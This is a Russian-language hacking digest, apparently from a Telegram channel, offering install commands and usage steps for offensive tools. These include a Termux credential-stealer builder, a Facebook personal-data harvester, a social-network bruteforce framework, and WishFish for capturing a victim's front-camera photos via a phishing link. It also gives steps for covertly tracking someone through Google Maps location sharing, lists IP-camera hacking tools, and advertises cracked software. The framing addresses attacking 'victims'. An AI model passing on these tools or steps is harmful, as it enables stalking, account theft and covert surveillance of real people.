Дайджест Beholder’s TOOLBOX - Phishing & SE 27/02/21

1. King Phisher [https://github.com/rsmusllp/king-phisher] Фишинговая платформа
2. Lockphish [github.com/jaykali/lockphish] Фишинг ввода пин-кода
3. Seeker [https://github.com/thewhiteh4t/seeker.git] получение данных о геолокации и мобильной системе
4. TrackUrl [https://github.com/Mauladen/TrackUrl] получение данных геолокации
5. Trape [https://github.com/boxug/trape.git] получение данных о геолокации и активности в социальных сетях
6. IPLogger: [https://iplogger.ru/location-tracker/]
7. SayHello [github.com/d093w1z/sayhello] Аудио контроль
8. Словари для БрутФорса [https://github.com/FlameOfIgnis/Pwdb-Public]
9. Пароли по умолчанию [https://github.com/ihebski/DefaultCreds-cheat-sheet]
10. ShotDroid [github.com/kp300/shotdroid] Кейлогер

Дайджест Beholder’s TOOLBOX - RF pentest 27/02/21

1. RFIDtools [github.com/RfidResearchGroup/RFIDtools] Инструменты для исследований NFC и RFID
2. Universal Radio Hacker [github.com/jopohl/urh] Исследование радиосигналов
3. bluescan [github.com/fO-000/bluescan] Сканер Bluetooth
4. RadareEye [github.com/souravbaghz/RadareEye] выполнение команд при появление определенного мак-адреса

Как следить за человеком через Google Maps на Android:

1. На смартфоне отслеживаемого запустите Google Maps
2. Откройте настройки профиля — «Передача геоданных»
3. Нажмите «Показывать, где я» и выберите «Доступ по ссылке»
4. Отправьте ссылку себе любым удобным способом

☝️😉 Впрочем... подобный "фокус" существует практически во всех популярных мессенджерах. Некоторым особняком стоить лишь Viber, в котором можно настроить передачу геолокации отправителя сообщений каждому отдельному собеседнику. Делается это в меню:

Чат с пользователем - Информация - Добавлять геометку

​FBI - инструмент для получения конфиденциальной информации о пользователе Facebook

Перед вами софтина, которая поможет получить информацию о месте жительства, дате рождения, роде занятий, номере телефона и адресе электронной почты вашей жертвы.

Установка

$ apt update && apt upgrade
$ apt install git python2
$ git clone https://github.com/Zefro1/FBI.git
$ cd fbi

Настройка

$ pip2 install -r requirements.txt

Запуск

$ python2 fbi.py

Если вы не знаете, как его использовать, введите «help», чтобы отобразить меню справки ✌️

Мутим стиллер в termux

Всем привет сегодня мы с вами научимся делать свой мини-стиллер прямо в термукс.

Установка

▪️apt update -y
▪️apt upgrade -y
▪️apt install git
▪️apt install python
▪️git clone https://github.com/Pix-head/stealBuilder
▪️cd stealBuilder
▪️pip download pyinstaller

Запуск

▪️tar -xzf <Downloaded file>
▪️cd <Downloaded file>
▪️sed -i'' -e 's#"/usr/tmp"#"/data/data/com.termux/files/usr/tmp"#g' bootloader/src/pyi_utils.c
▪️CFLAGS="-I/data/data/com.termux/files/usr/include/libandroid-support" LDFLAGS="-landroid-support" pip install 
▪️cd 
▪️python StealBuilder.py

Воруй, убивай 🦆

​​Установка дистрибутивов Linux (и 1 windows) в Termux

Deskify – дает уникальную возможность установить дистрибутивы Linux в приложении Termux для Android. Также вы получите среду рабочего стола с помощью VNC Viewer. Для работы с Deskify понадобится Termux и VNC Viewer, который можно скачать в Google Play Store.

Установка

$ git clone https://github.com/AbirHasan2005/Deskify
$ cd Deskify
$ chmod +x deskify.sh

Запуск

$ bash deskify.sh

Дистрибутивы

1. Ubuntu 18 & 19
2. Kali Linux
3. Debain
4. Arch Linux
5. Manjaro
6. Windows 7

Поздравляю, теперь у вас есть мобильный хакерфон ✌️

​​Брутфорсим социальные сети

SocialBox - это полноценный фреймворк для проведения брутфорс атаки на такие соц-сети, как Facebook, Gmail, Instagram, Twitter.

Установка

$ git clone https://github.com/samsesh/SocialBox-Termux.git
$ cd SocialBox-Termux
$ chmod +x SocialBox.sh
$ chmod +x install-sb.sh
$ ./install-sb.sh

Использование

$ ./SocialBox.sh

Более подробнее про данную утилиту читайте на GitHub ✌️

​Взлом фронтальной камеры с помощью ссылки

Wish Fish - это инструмент захвата изображений, который позволит вам захватывать изображения с телефона жертвы и сохранять их внутри вашего termux. используя этот инструмент, вы можете сделать снимок лица любого человека, просто отправив ему фишинговую ссылку. Этот инструмент может помочь в ситуациях, когда вы хотите узнать чью-то личность.

Как работает инструмент WishFish?

1. Создайте ссылку с помощью инструмента WishFish.
2. Отправьте ссылку, сгенерированную инструментом, жертве.
3. Когда жертва нажмет на ссылку, вы получите снимки с его камеры на свой телефон.
3. После этого вы можете непосредственно увидеть изображение или переместить его в свою внутреннюю память.

Как установить инструмент WishFish в Termux?

apt update & & apt upgrade -y
apt install php wget git -y

Это позволит установить Php wget и git в termux, которые будут использоваться при использовании инструмента WishFish. Если у вас уже есть что-то из этого, вы можете удалить это имя из команды во время установки.

Теперь все зависимости установлены в вашем termux, и теперь мы можем установить инструмент WishFish в termux, используя приведенную ниже команду. Размер файла этого инструмента настолько мал, что just скопируйте и вставьте приведенную ниже команду, и инструмент будет установлен через 10 секунд.

git clone https://github.com/kinghacker0/WishFish.git
cd WishFish
bash wishfish.sh

Как использовать WishFish в Termux?

bash wishfish.sh

Если вы впервые используете этот инструмент, он установит NGrok в Termux. Этот процесс может занять 1 минуту, если у вас медленный интернет. (кроме того, если вы не получаете ссылку, пожалуйста, перезагрузите ваш termux, и он решит эту проблему.)

Теперь вы получите ссылку, которую вы отправите жертве и подождите, когда жертва нажмет на эту ссылку, вы увидите Ip-адрес жертвы, после чего вы получите несколько файлов изображений в вашем приложении termux. Который будет снят с передней камеры жертвы. Вы получите более 1 изображения, если жертва остается на странице в течение длительного времени.

Теперь, когда вы закончили Захват изображений просто нажмите ctrl + C кнопку и введите команду ls, и вы увидите файлы изображений.

ls

Теперь, чтобы увидеть изображения, вам просто нужно ввести следующую команду, и вы сможете увидеть изображения в том же приложении termux.

 termux-open название_фотографии

Всем сочных фоточек ✌️

​​Подборка важных инструментов для повышения вашей анонимности и безопасности

Привет друзья! Сегодня собрал для вас разного рода инструменты, при использовании которых ваша анонимность станет чуточку выше.

Мессенеджеры:
Briar. Может работать как через интернет, так и без него (локальная сеть в одном WiFi и Bluetooth). Только Android.
Tox. Мессенджер, работающий по P2P. Внимание: для каждого устройства нужен свой ключ. Один ключ на нескольких устройствах не работает. iOS не поддерживается.
Jabber. Внезапно (нет). Федеративный (т.е. можно регистрироваться на любом сервере, а не одном).
Delta Chat. Использует обычный EMail под капотом, так что вы можете использовать свою почту.
Element. Тоже федеративный, протокол Matrix. https://element.io/get-started . Список серверов
Signal. Мессенеджер с открытым исходным кодом.

VPN для мобильных устройств:
ProtonVPN. Требует регистрацию. Бесплатно доступно около 15 серверов.
NordVPN. Требует регистрацию. Есть триал на 30 дней.
Psiphon. Не требует регистрацию.
OpenVPN

Почта:
https://cock.li
https://protonmail.com - не требует номер телефона, это одна из опций подтверждения регистрации. Можно просто пройти капчу, например, или указать адрес другой почты.
https://tutanota.com - вроде подтверждает аккаунты через некоторое время.

Файлообменники:
Пригодятся, если кому-то нужно что-то передать.

https://anonfiles.com
https://bayfiles.com

Главное:
Tor. https://torproject.org
I2P. https://geti2p.net/ru/

​Helicon Focus Pro - программа, которая создает одно полностью сфокусированное изображение из нескольких частично сфокусированных изображений, комбинируя сфокусированные области. Программа создана для макрофотографии, микрофотографии и гиперфокальной ландшафтной фотографии и позволяет решить проблему малой глубины резкости.
Обзор программы

🖥 ОС: Windows
📀 Разрядность: x64
🇷🇺 Язык интерфейса: Русский
🔑 Лечение: Crack

Дорк для поиска выходных нод сети Tor с самой что ни на есть дефолтной конфигурацией. 3500 тачек, по 10 CVE на каждой.

Поиск , позволяющий получить версию софта ноды, например, для поиска старых уязвимых версий.

Анонимусам привет.

Beholder’s дайджест - Получение доступа к ip видеокамера.

• angryip.org - удобный сетевой сканер
• https://github.com/Ullaakut/cameradar - поиск видеопотока в сети с возможностью подбора пароля
• https://github.com/Ullaakut/camerattack - глушилка rtsp потока по ip
• https://github.com/AngelSecurityTeam/Cam-Hackers - поиск открытых видеокамер по странам
• https://github.com/aktechunt3r/CamPhish - получение фото с камеры телефона/компьютера при помощи СИ
• https://github.com/analyserdmz/Pyllywood - брутфорс для видеокамер
• http://www.ispyconnect.com/cameras - API для подключения к видео потоку с камер различных вендоров
• https://www.mangocam.com/help/supported-cameras/ - синтаксис получения доступа к видеопотоку с IP камер различных вендоров.
• https://github.com/vanpersiexp/expcamera - поиск видеокамер с уязвимостью встроенного веб-сервера GoAhead
• https://www.hikvision.com/en/support/download/software/ivms4200-series - удобный просмотрщик видеопотоков.

Очень крутой проект для владельцев автомобилей Tesla - SCOUT (github.com/tevora-threat/Scout) позволяющий превратить свою Теслу в автомобиль наблюдения. Используя бортовые видеокамеры, позволяет отслеживать номера машин в потоке и лица людей регулярно появляющиеся в поле зрения камер и сигнализировать о факте преследования или наружнего наблюдения за вами.

Сам же автор объясняет, что систему можно использовать в различных целях: как для разведки, так и для контрразведки. Например, если система часто замечает один и тот же автомобильный номер или одного и того же человека — хозяину отправляется сообщение о подозрительной активности. Кто-то может планировать угон автомобиля, ограбление близлежащего дома или что-то подобное.

Лично проект не пробовал, но если вы вдруг обеспеченный парень или девчонка с Теслой, свободным временем, и тягой к интересному - расскажите уж как оно! Ибо звучит прям фантастически.

ImSter (github.com/armytricks/ImSter) - инструмент, позволяющий прятать текст в фотографии (стеганографией называется) Конечно же текст шифруется паролем с использованием 256-битного ключа AES и скрывается в самом теле картинки в виде пикселей, не оставляя при этом никаких следов в метаданных файла.

Конечно же это можно использовать в качестве способа передачи зашифрованных сообщений, но мне больше нравится идея с контролем утечки данных в виде графических файлов, используя этот инструмент в качестве нанесения такого своеобразного водяного знака.

Поговорим еще о полезном программном обеспечении OSINT-ера. Доктор Ватсон и Архивариус-3000 - это специализированные программы для поиска документов и почтовых сообщений в компьютере, локальной сети и съёмных дисках (CD, DVD и др.). Позволяют исследовать массивы текстовой информации с целью выявления сущностей и связей между ними. Очень удобно для тех, кто скопил множество текстовых баз данных и не умеет переводить их в формат одной из СУБД.

https://www.linkedin.com/pulse/useful-websites-your-investigation-chinese-individuals-shu-han/
Для тех, кто интересовался проверкой контрагентов в Китае...

Напомним про такой знаменитый сервис, как Shodan. Именно он в т.ч. позволяет искать утечки камер видеонаблюдения по всему миру. У него, конечно же, есть аналоги FOFA.so, ZoomEye, Censys. Но... все-же Shodan - это уже имя нарицательное.